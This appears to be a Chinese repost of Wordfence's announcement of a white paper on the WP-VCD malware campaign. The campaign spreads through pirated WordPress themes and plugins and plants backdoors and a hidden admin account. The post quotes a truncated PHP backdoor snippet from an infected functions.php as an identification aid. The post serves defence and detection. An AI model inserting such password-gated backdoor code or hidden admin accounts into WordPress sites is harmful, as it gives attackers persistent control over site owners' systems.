最近几周,WordPress生态系统面临的最普遍的恶意软件感染之一称为WP-VCD运动。尽管该活动存在相对较长的时间,但自2019年8月以来,Wordfence威胁情报团队每周都将WP-VCD与新感染率相关联,这一趋势比任何其他WordPress恶意软件都要高,并且该活动没有丝毫放缓的迹象。
在今天的文章中,我们将发布分析WP-VCD的综合白皮书。本白皮书包含了我们对这一流行运动的研究工作的全部细节。它可以作为威胁分析人员、安全研究人员、WordPress开发人员和管理员以及对跟踪或阻止与WP-VCD相关的行为感兴趣的其他人员的资源。
WP-VCD简介
WP-VCD感染本身通过“免费”或盗版的插件和主题传播,这些插件和主题由相关站点的网络分发,并且一旦部署,它的传播方式就非常引人注目。在幕后,大量的命令和控制(C2)基础结构以及自我修复感染使攻击者能够在这些感染站点上保持立足之地,非常难清理!
WordPress大学呼吁:请不要再使用盗版和所谓“免费”的高级主题和插件,否则很容易就感染这样恶意代码,得不偿失!
WP-VCD通过修改 WordPress 核心文件并在/wp-includes目录中添加新文件,WP-VCD恶意软件在WordPress站点中创建了后门。注入恶意软件后,它会在WordPress后台上秘密创建一个用户名为“100010010”的管理员账户。这样一来,它便可以访问您的网站,然后可以注入更多的恶意代码以供以后滥用。
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain']))
上面的代码段来自受WP-VCD感染的站点上的受感染的functions.php文件。由于该活动的普遍性,具有处理WordPress恶意软件感染经验的任何人都可以根据这个示例代码来识别是否被WP-VCD感染。
完整报告中包含WP-VCD活动的详细信息和代码分析。
基础架构、盈利和归因
在其历史的各个阶段,已经添加了特定功能并从恶意软件中删除了特定功能,但是WP-VCD的大多数核心组件仍然保持一致。获利主要来自两个方面:旨在通过黑帽SEO操纵搜索引擎结果的病毒式营销活动,以及为浏览受感染网站的用户创建潜在危险的重定向和弹出广告的恶意代码。
在白皮书中,我们对WP-VCD的基础架构和货币化方案的范围提供了一些见解。我们还将揭示数据,这些数据可归因于战役背后的威胁参与者。
妥协指标(IOC)
为了帮助安全界预防,发现和根除WP-VCD感染,我们提供了与此活动相关的IOC的详尽列表。我们还共享了一些与YARA兼容的恶意软件检测规则,供公众使用以识别受感染的站点。
阅读完整报告
我们对WP-VCD进行调查的全部范围远远超出了典型的研究博客文章的范围,因此,请阅读完整的白皮书:WP-VCD:您在自己的网站上安装的恶意软件。
鸣谢:Mikey Veenstra的WP-VCD白皮书。由Sean Murphy和Ramuel Gall编辑。
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如遇到加密压缩包,默认解压密码为"www.yuankufang.com",如遇到无法解压的请联系管理员!
源库坊 » 警惕通过WordPress盗版主题和插件传播的恶意代码WP-VCD
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 提示下载完但解压或打开不了?
- 找不到素材资源介绍文章里的示例图片?
- 源库坊